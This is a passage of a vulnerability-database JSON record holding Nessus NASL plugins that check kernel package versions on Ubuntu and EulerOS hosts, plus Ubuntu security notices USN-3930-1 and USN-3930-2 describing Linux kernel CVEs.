(ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-gke\", pkgver:\"4.18.0.1008.8\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-kvm\", pkgver:\"4.18.0.1009.9\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.18.0.17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-raspi2\", pkgver:\"4.18.0.1011.8\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.18.0.17.18\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-virtual\", pkgver:\"4.18.0.17.18\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.18-aws / linux-image-4.18-azure / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-09T16:59:20", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel's perf\n subsystem retrieved userlevel stack traces on PowerPC\n systems. A local, unprivileged user could use this flaw\n to cause a denial of service on the system by creating\n a special stack layout that would force the\n perf_callchain_user_64() function into an infinite\n loop.(CVE-2015-6526i1/4%0\n\n - A vulnerability was found in the Linux kernel. Payloads\n of NM entries are not supposed to contain NUL. When\n such entry is processed, only the part prior to the\n first NUL goes into the concatenation (i.e. the\n directory entry name being encoded by a bunch of NM\n entries). The process stops when the amount collected\n so far + the claimed amount in the current NM entry\n exceed 254. However, the value returned as the total\n length is the sum of *claimed* sizes, not the actual\n amount collected. And that's what will be passed to\n readdir() callback as the name length - 8Kb\n __copy_to_user() from a buffer allocated by\n __get_free_page().(CVE-2016-4913i1/4%0\n\n - The perf_trace_event_perm function in\n kernel/trace/trace_event_perf.c in the Linux kernel\n before 3.12.2 does not properly restrict access to the\n perf subsystem, which allows local users to enable\n function tracing via a crafted\n application.(CVE-2013-2930i1/4%0\n\n - The mincore() implementation in mm/mincore.c in the\n Linux kernel through 4.19.13 allowed local attackers to\n observe page cache access patterns of other processes\n on the same system, potentially allowing sniffing of\n secret information. (Fixing this affects the output of\n the fincore program.) Limited remote exploitation may\n be possible, as demonstrated by latency differences in\n accessing public files from an Apache HTTP\n Server.(CVE-2019-5489i1/4%0\n\n - It was found that the espfix functionality could be\n bypassed by installing a 16-bit RW data segment into\n GDT instead of LDT (which espfix checks), and using\n that segment on the stack. A local, unprivileged user\n could potentially use this flaw to leak kernel stack\n addresses.(CVE-2014-8133i1/4%0\n\n - An issue was discovered in the btrfs filesystem code in\n the Linux kernel. An out-of-bounds access is possible\n in write_extent_buffer() when mounting and operating a\n crafted btrfs image due to a lack of verification at\n mount time within the btrfs_read_block_groups() in\n fs/btrfs/extent-tree.c function. This could lead to a\n system crash and a denial of service.(CVE-2018-14610i1/4%0\n\n - kernel/bpf/verifier.c in the Linux kernel through\n 4.14.8 mishandles states_equal comparisons between the\n pointer data type and the UNKNOWN_VALUE data type,\n which allows local users to obtain potentially\n sensitive address information, aka a 'pointer\n leak.'(CVE-2017-17864i1/4%0\n\n - drivers/hid/hid-lenovo-tpkbd.c in the Human Interface\n Device (HID) subsystem in the Linux kernel through\n 3.11, when CONFIG_HID_LENOVO_TPKBD is enabled, allows\n physically proximate attackers to cause a denial of\n service (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2894i1/4%0\n\n - Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c in the Linux kernel\n allows local users to cause a denial of service (kernel\n memory exhaustion) via multiple read accesses to files\n in the /sys/class/sas_phy directory.(CVE-2018-7757i1/4%0\n\n - It was found that the original fix for CVE-2016-6786\n was incomplete. There exist a race between two\n concurrent sys_perf_event_open() calls when both try\n and move the same pre-existing software group into a\n hardware context.(CVE-2017-6001i1/4%0\n\n - In the Linux kernel before 4.20.12,\n net/ipv4/netfilter/nf_nat_snmp_basic_main.c in the SNMP\n NAT module has insufficient ASN.1 length checks (aka an\n array index error), making out-of-bounds read and write\n operations possible, leading to an OOPS or local\n privilege escalation. This affects snmp_version and\n snmp_helper.(CVE-2019-9162i1/4%0\n\n - An information leak flaw was found in the way the Linux\n kernel's Advanced Linux Sound Architecture (ALSA)\n implementation handled access of the user control's\n state. A local, privileged user could use this flaw to\n leak kernel memory to user space.(CVE-2014-4652i1/4%0\n\n - A flaw was found that the vfs_rename() function did not\n detect hard links on overlayfs. A local, unprivileged\n user could use the rename syscall on overlayfs on top\n of xfs to crash the system.(CVE-2016-6198i1/4%0\n\n - It was found that when file permissions were modified\n via chmod and the user modifying them was not in the\n owning group or capable of CAP_FSETID, the setgid bit\n would be cleared. Setting a POSIX ACL via setxattr sets\n the file permissions as well as the new ACL, but\n doesn't clear the setgid bit in a similar way. This\n could allow a local user to gain group privileges via\n certain setgid applications.(CVE-2016-7097i1/4%0\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2014-9644i1/4%0\n\n - An arbitrary memory r/w access issue was found in the\n Linux kernel compiled with the eBPF bpf(2) system call\n (CONFIG_BPF_SYSCALL) support. The issue could occur due\n to calculation errors in the eBPF verifier module,\n triggered by user supplied malicious BPF program. An\n unprivileged user could use this flaw to escalate their\n privileges on a system. Setting parameter\n 'kernel.unprivileged_bpf_disabled=1' prevents such\n privilege escalation by restricting access to bpf(2)\n call.(CVE-2017-16995i1/4%0\n\n - A flaw was found in the implementation of associative\n arrays where the add_key systemcall and KEYCTL_UPDATE\n operations allowed for a NULL payload with a nonzero\n length. When accessing the payload within this length\n parameters value, an unprivileged user could trivially\n cause a NULL pointer dereference (kernel\n oops).(CVE-2017-15274i1/4%0\n\n - A flaw was found in the Linux kernel's keyring handling\n code: the key_reject_and_link() function could be\n forced to free an arbitrary memory block. An attacker\n could use this flaw to trigger a use-after-free\n condition on the system, potentially allowing for\n privilege escalation.(CVE-2016-4470i1/4%0\n\n - A flaw was found in the way certain interfaces of the\n Linux kernel's Infiniband subsystem used write() as\n bi-directional ioctl() replacement, which could lead to\n insufficient memory security checks when being invoked\n using the splice() system call. A local unprivileged\n user on a system with either Infiniband hardware\n present or RDMA Userspace Connection Manager Access\n module explicitly loaded, could use this flaw to\n escalate their privileges on the\n system.(CVE-2016-4565i1/4%0\n\n - It was found that the Linux kernel's IPv6 network stack\n did not properly validate the value of the MTU variable\n when it was set. A remote attacker could potentially\n use this flaw to disrupt a target system's networking\n (packet loss) by setting an invalid MTU value, for\n example, via a NetworkManager daemon that is processing\n router advertisement packets running on the target\n system.(CVE-2015-8215i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1532)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2013-2894", "CVE-2016-7097", "CVE-2018-14610", "CVE-2017-15274", "CVE-2015-8215", "CVE-2016-4913", "CVE-2017-6001", "CVE-2017-16995", "CVE-2018-7757", "CVE-2015-6526", "CVE-2019-9162", "CVE-2016-6198", "CVE-2014-4652", "CVE-2013-2930", "CVE-2016-6786", "CVE-2016-4470", "CVE-2014-8133", "CVE-2016-4565", "CVE-2017-17864", "CVE-2019-5489"], "modified": "2019-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1532.NASL", "href": "https://www.tenable.com/plugins/nessus/124985", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124985);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\n \"CVE-2013-2894\",\n \"CVE-2013-2930\",\n \"CVE-2014-4652\",\n \"CVE-2014-8133\",\n \"CVE-2014-9644\",\n \"CVE-2015-6526\",\n \"CVE-2015-8215\",\n \"CVE-2016-4470\",\n \"CVE-2016-4565\",\n \"CVE-2016-4913\",\n \"CVE-2016-6198\",\n \"CVE-2016-7097\",\n \"CVE-2017-15274\",\n \"CVE-2017-16995\",\n \"CVE-2017-17864\",\n \"CVE-2017-6001\",\n \"CVE-2018-14610\",\n \"CVE-2018-7757\",\n \"CVE-2019-5489\",\n \"CVE-2019-9162\"\n );\n script_bugtraq_id(\n 62052,\n 64318,\n 68170,\n 71684,\n 72320\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1532)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel's perf\n subsystem retrieved userlevel stack traces on PowerPC\n systems. A local, unprivileged user could use this flaw\n to cause a denial of service on the system by creating\n a special stack layout that would force the\n perf_callchain_user_64() function into an infinite\n loop.(CVE-2015-6526i1/4%0\n\n - A vulnerability was found in the Linux kernel. Payloads\n of NM entries are not supposed to contain NUL. When\n such entry is processed, only the part prior to the\n first NUL goes into the concatenation (i.e. the\n directory entry name being encoded by a bunch of NM\n entries). The process stops when the amount collected\n so far + the claimed amount in the current NM entry\n exceed 254. However, the value returned as the total\n length is the sum of *claimed* sizes, not the actual\n amount collected. And that's what will be passed to\n readdir() callback as the name length - 8Kb\n __copy_to_user() from a buffer allocated by\n __get_free_page().(CVE-2016-4913i1/4%0\n\n - The perf_trace_event_perm function in\n kernel/trace/trace_event_perf.c in the Linux kernel\n before 3.12.2 does not properly restrict access to the\n perf subsystem, which allows local users to enable\n function tracing via a crafted\n application.(CVE-2013-2930i1/4%0\n\n - The mincore() implementation in mm/mincore.c in the\n Linux kernel through 4.19.13 allowed local attackers to\n observe page cache access patterns of other processes\n on the same system, potentially allowing sniffing of\n secret information. (Fixing this affects the output of\n the fincore program.) Limited remote exploitation may\n be possible, as demonstrated by latency differences in\n accessing public files from an Apache HTTP\n Server.(CVE-2019-5489i1/4%0\n\n - It was found that the espfix functionality could be\n bypassed by installing a 16-bit RW data segment into\n GDT instead of LDT (which espfix checks), and using\n that segment on the stack. A local, unprivileged user\n could potentially use this flaw to leak kernel stack\n addresses.(CVE-2014-8133i1/4%0\n\n - An issue was discovered in the btrfs filesystem code in\n the Linux kernel. An out-of-bounds access is possible\n in write_extent_buffer() when mounting and operating a\n crafted btrfs image due to a lack of verification at\n mount time within the btrfs_read_block_groups() in\n fs/btrfs/extent-tree.c function. This could lead to a\n system crash and a denial of service.(CVE-2018-14610i1/4%0\n\n - kernel/bpf/verifier.c in the Linux kernel through\n 4.14.8 mishandles states_equal comparisons between the\n pointer data type and the UNKNOWN_VALUE data type,\n which allows local users to obtain potentially\n sensitive address information, aka a 'pointer\n leak.'(CVE-2017-17864i1/4%0\n\n - drivers/hid/hid-lenovo-tpkbd.c in the Human Interface\n Device (HID) subsystem in the Linux kernel through\n 3.11, when CONFIG_HID_LENOVO_TPKBD is enabled, allows\n physically proximate attackers to cause a denial of\n service (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2894i1/4%0\n\n - Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c in the Linux kernel\n allows local users to cause a denial of service (kernel\n memory exhaustion) via multiple read accesses to files\n in the /sys/class/sas_phy directory.(CVE-2018-7757i1/4%0\n\n - It was found that the original fix for CVE-2016-6786\n was incomplete. There exist a race between two\n concurrent sys_perf_event_open() calls when both try\n and move the same pre-existing software group into a\n hardware context.(CVE-2017-6001i1/4%0\n\n - In the Linux kernel before 4.20.12,\n net/ipv4/netfilter/nf_nat_snmp_basic_main.c in the SNMP\n NAT module has insufficient ASN.1 length checks (aka an\n array index error), making out-of-bounds read and write\n operations possible, leading to an OOPS or local\n privilege escalation. This affects snmp_version and\n snmp_helper.(CVE-2019-9162i1/4%0\n\n - An information leak flaw was found in the way the Linux\n kernel's Advanced Linux Sound Architecture (ALSA)\n implementation handled access of the user control's\n state. A local, privileged user could use this flaw to\n leak kernel memory to user space.(CVE-2014-4652i1/4%0\n\n - A flaw was found that the vfs_rename() function did not\n detect hard links on overlayfs. A local, unprivileged\n user could use the rename syscall on overlayfs on top\n of xfs to crash the system.(CVE-2016-6198i1/4%0\n\n - It was found that when file permissions were modified\n via chmod and the user modifying them was not in the\n owning group or capable of CAP_FSETID, the setgid bit\n would be cleared. Setting a POSIX ACL via setxattr sets\n the file permissions as well as the new ACL, but\n doesn't clear the setgid bit in a similar way. This\n could allow a local user to gain group privileges via\n certain setgid applications.(CVE-2016-7097i1/4%0\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2014-9644i1/4%0\n\n - An arbitrary memory r/w access issue was found in the\n Linux kernel compiled with the eBPF bpf(2) system call\n (CONFIG_BPF_SYSCALL) support. The issue could occur due\n to calculation errors in the eBPF verifier module,\n triggered by user supplied malicious BPF program. An\n unprivileged user could use this flaw to escalate their\n privileges on a system. Setting parameter\n 'kernel.unprivileged_bpf_disabled=1' prevents such\n privilege escalation by restricting access to bpf(2)\n call.(CVE-2017-16995i1/4%0\n\n - A flaw was found in the implementation of associative\n arrays where the add_key systemcall and KEYCTL_UPDATE\n operations allowed for a NULL payload with a nonzero\n length. When accessing the payload within this length\n parameters value, an unprivileged user could trivially\n cause a NULL pointer dereference (kernel\n oops).(CVE-2017-15274i1/4%0\n\n - A flaw was found in the Linux kernel's keyring handling\n code: the key_reject_and_link() function could be\n forced to free an arbitrary memory block. An attacker\n could use this flaw to trigger a use-after-free\n condition on the system, potentially allowing for\n privilege escalation.(CVE-2016-4470i1/4%0\n\n - A flaw was found in the way certain interfaces of the\n Linux kernel's Infiniband subsystem used write() as\n bi-directional ioctl() replacement, which could lead to\n insufficient memory security checks when being invoked\n using the splice() system call. A local unprivileged\n user on a system with either Infiniband hardware\n present or RDMA Userspace Connection Manager Access\n module explicitly loaded, could use this flaw to\n escalate their privileges on the\n system.(CVE-2016-4565i1/4%0\n\n - It was found that the Linux kernel's IPv6 network stack\n did not properly validate the value of the MTU variable\n when it was set. A remote attacker could potentially\n use this flaw to disrupt a target system's networking\n (packet loss) by setting an invalid MTU value, for\n example, via a NetworkManager daemon that is processing\n router advertisement packets running on the target\n system.(CVE-2015-8215i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1532\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bf9dd973\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BPF Sign Extension Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:38:10", "bulletinFamily": "unix", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "description": "Mathias Payer and Hui Peng discovered a use-after-free vulnerability in the \nAdvanced Linux Sound Architecture (ALSA) subsystem. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information \nleak in the Bluetooth implementation of the Linux kernel. An attacker \nwithin Bluetooth range could use this to expose sensitive information \n(kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel \ncontained a use-after-free vulnerability. An attacker in a guest VM with \naccess to /dev/kvm could use this to cause a denial of service (guest VM \ncrash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in \nthe KVM subsystem of the Linux kernel, when using nested virtual machines. \nA local attacker in a guest VM could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code in the host system. \n(CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability existed in \nthe KVM subsystem of the Linux kernel, when nested virtualization is used. \nA local attacker could use this to expose sensitive information (host \nsystem memory to a guest VM). (CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel was \ninsufficiently hardened against Spectre V1 attacks. A local attacker could \nuse this to expose sensitive information. (CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the user- \nspace API for crypto (af_alg) implementation in the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate memory \nwhen handling certain errors while reading files. A local attacker could \nuse this to cause a denial of service (excessive memory consumption). \n(CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the IPMI \nimplementation in the Linux kernel. A local attacker with access to the \nIPMI character device files could use this to cause a denial of service \n(system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux kernel \nperformed insufficient ASN.1 length checks. An attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel did \nnot properly check for the mmap minimum address in some situations. A local \nattacker could use this to assist exploiting a kernel NULL pointer \ndereference vulnerability. (CVE-2019-9213)", "edition": 3, "modified": "2019-04-02T00:00:00", "published": "2019-04-02T00:00:00", "id": "USN-3930-1", "href": "https://ubuntu.com/security/notices/USN-3930-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:35:59", "bulletinFamily": "unix", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "description": "USN-3930-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.10. \nThis update provides the corresponding updates for the Linux Hardware \nEnablement (HWE) kernel from Ubuntu 18.10 for Ubuntu 18.04 LTS.\n\nMathias Payer and Hui Peng discovered a use-after-free vulnerability in the \nAdvanced Linux Sound Architecture (ALSA) subsystem. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information \nleak in the Bluetooth implementation of the Linux kernel. An attacker \nwithin Bluetooth range could use this to expose sensitive information \n(kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel \ncontained a use-after-free vulnerability. An attacker in a guest VM with \naccess to /dev/kvm could use this to cause a denial of service (guest VM \ncrash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in \nthe KVM subsystem of the Linux kernel, when using nested virtual machines. \nA local attacker in a guest VM could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code in the host system. \n(CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability existed in \nthe KVM subsystem of the Linux kernel, when nested virtualization is used. \nA local attacker could use this to expose sensitive information (host \nsystem memory to a guest VM). (CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel was \ninsufficiently hardened against Spectre V1 attacks. A local attacker could \nuse this to expose sensitive information. (CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the user- \nspace API for crypto (af_alg) implementation in the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate memory \nwhen handling certain errors while reading files. A local attacker could \nuse this to cause a denial of service (excessive memory consumption). \n(CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the IPMI \nimplementation in the Linux kernel. A local attacker with access to the \nIPMI character device files could use this to cause a denial of service \n(system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux kernel \nperformed insufficient ASN.1 length checks. An attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel did \nnot properly check for the mmap minimum address in some situations. A local \nattacker could use this to assist exploiting a kernel NULL pointer \ndereference vulnerability. (CVE-2019-9213)", "edition": 3, "modified": "2019-04-02T00:00:00", "published": "2019-04-02T00:00:00", "id": "USN-3930-2", "href": "https://ubuntu.com/security/notices/USN-3930-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}